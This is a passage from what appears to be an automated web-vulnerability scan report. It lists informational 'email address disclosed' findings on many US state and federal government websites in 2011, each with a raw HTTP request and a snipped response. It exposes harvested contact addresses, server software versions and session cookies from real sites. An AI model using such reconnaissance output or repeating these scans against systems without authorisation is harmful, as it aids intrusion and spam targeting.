else {
return(true);
}
}
else return(true);
   
}

//////////////////////////////////////////////////////////////
...[SNIP]...
osition = -1;
   var format = /^[a-z][\w.]*@[\w\.]+\.[a-z]{2,3}/i

   if ( ! Email == "") {

       if (! format.test(Email))
           {
               alert("Please enter your email address in the correct format. Ex. johndoe@hotmail.com");
           } else
        {

           Subject7()
        }
       }
   else {
       Subject7()
    }
   
}


function Subject7() {
   var theForm;
   theForm = document.SWEForm1_0;
   var Subject = theForm.c_Abstrac
...[SNIP]...
-1;
//    var format = /^[a-z][\w.]*@[\w\.]+\.[a-z]{2,3}/i

//    if ( ! Email == "") {

//        if (! format.test(Email))
//            {
//                alert("Please enter your email address in the correct format. Ex. johndoe@hotmail.com");
//            } else
//         {
//
//            Subject10()
//         }
//
//
//        }
//    else
//        {
//            Subject10()
//        }
//}


function Subject10() {
   var theForm;
   theForm = document.SWEForm1_0;

...[SNIP]...

22.111. https://txapps.texas.gov/tolapp/viewandpay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://txapps.texas.gov
Path:   /tolapp/viewandpay

Issue detail

The following email address was disclosed in the response:

Request

GET /tolapp/viewandpay HTTP/1.1
Host: txapps.texas.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:26:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c
Cache-Control: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Content-Length: 5545
Expires: 0
Set-Cookie: JSESSIONID=YhD0N8QD11LQ4mKJSvnyxhrR5SQTfVL0T7T9pw9G8ScBsGwXRDnt!1282520447!-1064935277; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="mailto:support@texasgovhelpdesk.com" title="Texas.gov Help">
...[SNIP]...
<a href="mailto:support@texasgovhelpdesk.com" title="Ayuda Texas.gov">
...[SNIP]...

22.112. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webapps6.doc.state.nc.us
Path:   /opi/offenderescapesearch.do

Issue detail

The following email address was disclosed in the response:

Request

GET /opi/offenderescapesearch.do HTTP/1.1
Host: webapps6.doc.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:10 GMT
Server: Apache/2.0.63 (Win32) mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=96BEE71CF7B6C8FD7143F7EDF69FBDCA.CRMIS164_423; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 57016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>
<!-- North Carolina Department of Correction Offender Publi
...[SNIP]...
}
}
}
if (fields.length > 0) {
jcv_handleErrors(fields, focusField);
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function jcv_checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
// TLD checking turned off by def
...[SNIP]...

22.113. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webapps6.doc.state.nc.us
Path:   /opi/offenderreleasesearch.do

Issue detail

The following email address was disclosed in the response:

Request

GET /opi/offenderreleasesearch.do HTTP/1.1
Host: webapps6.doc.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:16 GMT
Server: Apache/2.0.63 (Win32) mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=38378D71BF34228CCDD27F2C234C3EA2.CRMIS75_423; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 63053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>
<!-- North Carolina Department of Correction Offender Publi
...[SNIP]...
}
}
}
if (fields.length > 0) {
jcv_handleErrors(fields, focusField);
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function jcv_checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
// TLD checking turned off by def
...[SNIP]...

22.114. http://www.511ia.org/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.511ia.org
Path:   /default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /default.asp HTTP/1.1
Host: www.511ia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:27:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 103464
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRTBDCD=FNHFKGFBDBEHNOIKFNCIKDFO; path=/
Cache-control: private


<html>
<head>
<title>Iowa DOT Travel Information Service</title>
<meta http-equiv="Refresh" content="300">
<meta http-equiv="Expires" content="4/30/2011 8:27:49 AM">
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:511Feedback@dot.iowa.gov?subject=%5B511%20Website%5D">
...[SNIP]...

22.115. http://www.adfg.alaska.gov/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfg.alaska.gov
Path:   /index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /index.cfm?adfg=home.main HTTP/1.1
Host: www.adfg.alaska.gov
Proxy-Connection: keep-alive
Referer: http://alaska.gov/quote.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:17:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: CFID=2291328; Expires=Mon, 22-Apr-2041 22:17:44 GMT; Path=/
Set-Cookie: CFTOKEN=80327216; Expires=Mon, 22-Apr-2041 22:17:44 GMT; Path=/
Set-Cookie: JSESSIONID=9949254E8F91CB0A31579F9385A8CFE2; Path=/; HttpOnly
Via: 1.1 www.adfg.alaska.gov
Content-Length: 54078

<!DOCTYPE html>
   
   
                                                           <html lang="en-us">
   <head>
<title>Home Page, Alaska Department of Fish and Game</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<meta name="author" content="dfg.webmaster@alaska.gov">
...[SNIP]...
<a href="mailto:dfg.webmaster@alaska.gov">
...[SNIP]...
<a href="mailto:dfg.webmaster@alaska.gov">
...[SNIP]...

22.116. http://www.ag.ny.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ag.ny.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.ag.ny.gov
Proxy-Connection: keep-alive
Referer: http://www.oag.state.ny.us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69751567.1304117377.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69751567.1583628114.1304117377.1304117377.1304117377.1; __utmc=69751567; __utmb=69751567.2.10.1304117377

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 29 Apr 2011 22:50:24 GMT
Content-type: text/html
Content-Length: 19025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta name="reply-to" content="webmaster@ag.ny.gov Office of the Attorney General" />
...[SNIP]...

22.117. https://www.alabamainteractive.org/abc_license/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /abc_license/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /abc_license/ HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?id=professional
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:24:51 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcWSekZskj886PHHaK_s; path=/
Keep-Alive: timeout=20, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3284


<link rel='stylesheet' href='content/common/styleSheet.jsp' type='text/css'/>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="containerTable">
...[SNIP]...
<a href="mailto:rvp@abcboard.state.al.us;jsessionid=abcWSekZskj886PHHaK_s">rvp@abcboard.state.al.us</a>
...[SNIP]...
<a href="mailto:support@alabamainteractive.org;jsessionid=abcWSekZskj886PHHaK_s?subject=ABC License Renewal Question?">support@alabamainteractive.org</a>
...[SNIP]...

22.118. https://www.alabamainteractive.org/arecmenu/welcome.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /arecmenu/welcome.action

Issue detail

The following email address was disclosed in the response:

Request

GET /arecmenu/welcome.action HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?id=professional
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcZcJfPy2b9VciC3-J_s

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:25:05 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 4958


<html>


<head>

<title>
Alabama Real Estate Commission Application Menu - login
</title>
<link rel='stylesheet' href='content/common/CSS/BrownAndGold.css' type='text/css'/>

<s
...[SNIP]...
<a href="mailto:support@alabamainteractive.org?subject=Alabama Real Estate Commission Menu Application Question?"><span class="activeLink">support@alabamainteractive.org</span>
...[SNIP]...

22.119. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /includes/javascript/DD_roundies_0.0.2a-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/javascript/DD_roundies_0.0.2a-min.js HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:22 GMT
Server: Apache
Last-Modified: Tue, 09 Nov 2010 21:23:37 GMT
ETag: "e9484-20dd-5a93e840"
Accept-Ranges: bytes
Content-Length: 8413
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:

...[SNIP]...

22.120. http://www.archives.gov/veterans/military-service-records/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /veterans/military-service-records/

Issue detail

The following email address was disclosed in the response:

Request

GET /veterans/military-service-records/ HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30295279.1304124528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30295279.300828153.1304124528.1304124528.1304124528.1; __utmc=30295279; __utmb=30295279.1.10.1304124528; fsr.s={"v":1,"rid":"1304124556632_237243","pv":1,"to":3,"c":"http://www.archives.gov/veterans/evetrecs/index.html","lc":{"d0":{"v":1,"s":false}},"sd":0}

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>Start Your Military S
...[SNIP]...
<a href="mailto:mpr.status@nara.gov">mpr.status@nara.gov</a>
...[SNIP]...

22.121. https://www.bbb.org/online/consumer/cks.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bbb.org
Path:   /online/consumer/cks.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Apr 2011 12:29:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 7622
Set-Cookie: BBB_Cookie=3886160556.20480.0000; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   B
...[SNIP]...
<a href="mailto:infringement@council.bbb.org?subject= Misuse of BBBOnLine Seals">
infringement@council.bbb.org</a>
...[SNIP]...

22.122. http://www.bea.gov/bea/regional/reis/default.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bea.gov
Path:   /bea/regional/reis/default.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /bea/regional/reis/default.cfm HTTP/1.1
Host: www.bea.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 30 Apr 2011 12:29:45 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="w3c/p3p.xml", CP="NOI DSP COR CUR ADMa OUR STP OTC"
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<html>


<head>

   <title>
       BEA File Error
   </title>

   <link rel="stylesheet" type="text/css" href="/beawebstyle/bea.css">

   <script>
   function preload(imgObj,imgSrc) {
   if (document.imag
...[SNIP]...
<a href="mailto:webmaster@bea.gov">
...[SNIP]...
<a href="mailto:webmaster@bea.gov">
...[SNIP]...

22.123. http://www.blogs.va.gov/VAntage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogs.va.gov
Path:   /VAntage/

Issue detail

The following email address was disclosed in the response:

Request

GET /VAntage/ HTTP/1.1
Host: www.blogs.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:25:18 GMT
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.blogs.va.gov/VAntage/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS6ae993=ae4e3cc522f21e76a47c42b6ecf463b3342e156c215790994dbc00b9; Max-Age=900; Path=/
Content-Length: 52649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<a href="mailto:newmedia@va.gov">newmedia@va.gov</a>
...[SNIP]...

22.124. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.budget.state.pa.us
Path:   /portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

Issue detail

The following email address was disclosed in the response:

Request

GET /portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566 HTTP/1.1
Host: www.budget.state.pa.us
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/community/pa_gov/2966
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=o0wp4k55g2s4a4miw52ccf55; path=/
Expires: 1304037449218
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304123849218
Content-Type: text/html; charset=utf-8
Content-Length: 52356

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Current and Proposed Commonw
...[SNIP]...
<A title=mailto:GBOpublications@state.pa.us href="mailto:GBOpublications@state.pa.us"><FONT face=verdana size=2>GBOpublications@state.pa.us</FONT>
...[SNIP]...

22.125. http://www.colorado.gov/apps/epostcard/servlet/begin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /apps/epostcard/servlet/begin

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/epostcard/servlet/begin HTTP/1.1
Host: www.colorado.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServer=348127242.20480.0000; __utmv=; JSESSIONID=cx3hS880vVX_KdjjM_; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.94.8.1304162601730;

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:30:01 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19969
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...
<a href="mailto:support@www.colorado.gov">support@www.colorado.gov</a>
...[SNIP]...

22.126. http://www.colorado.gov/apps/feedback/servlet/begin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /apps/feedback/servlet/begin

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/feedback/servlet/begin HTTP/1.1
Host: www.colorado.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServer=348127242.20480.0000; __utmv=; JSESSIONID=cx3hS880vVX_KdjjM_; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.94.8.1304162601730;

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:30:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19969
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...
<a href="mailto:support@www.colorado.gov">support@www.colorado.gov</a>
...[SNIP]...

22.127. http://www.coloradochannel.net/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradochannel.net
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js?D HTTP/1.1
Host: www.coloradochannel.net
Proxy-Connection: keep-alive
Referer: http://www.coloradochannel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c46cefb3d49ee625c6d0242934806ee=pr3o6cnkqcgvda1n4st4t8ob24

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:32:46 GMT
Server: Apache
Last-Modified: Fri, 03 Dec 2010 17:34:57 GMT
ETag: "f4a9f-649-49684f4fe5240"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.128. http://www.ct.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31101
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD><BASE HREF='http://www.ct.gov/ctportal/site/default.asp'>


       <!--

...[SNIP]...
<meta HTTP-EQUIV="reply-To" CONTENT="pmg@po.state.ct.us">
...[SNIP]...
<DSFCONTENT ID="1437" NAME="ctportal" ABBREV="CT.gov" TITLE="CT.gov Portal" CONTACT="pmg@po.state.ct.us" uuid="B53DAE08-77E9-42E6-8642-A040ADE11353">
...[SNIP]...
<A class=noUnderline href="mailto:webmaster@po.state.ct.us">
...[SNIP]...

22.129. http://www.ct.gov/ctportal/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/cwp/view.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ctportal/cwp/view.asp?a=843&q=431930 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:49:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30177
Content-Type: text/html
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D843%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<meta HTTP-EQUIV="reply-To" CONTENT="pmg@po.state.ct.us">
...[SNIP]...
<DSFCONTENT ID="1437" NAME="ctportal" ABBREV="CT.gov" TITLE="CT.gov Portal" CONTACT="pmg@po.state.ct.us" uuid="B53DAE08-77E9-42E6-8642-A040ADE11353">
...[SNIP]...
<A class=noUnderline href="mailto:webmaster@po.state.ct.us">
...[SNIP]...

22.130. http://www.ct.gov/ctportal/site/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/site/default.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ctportal/site/default.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
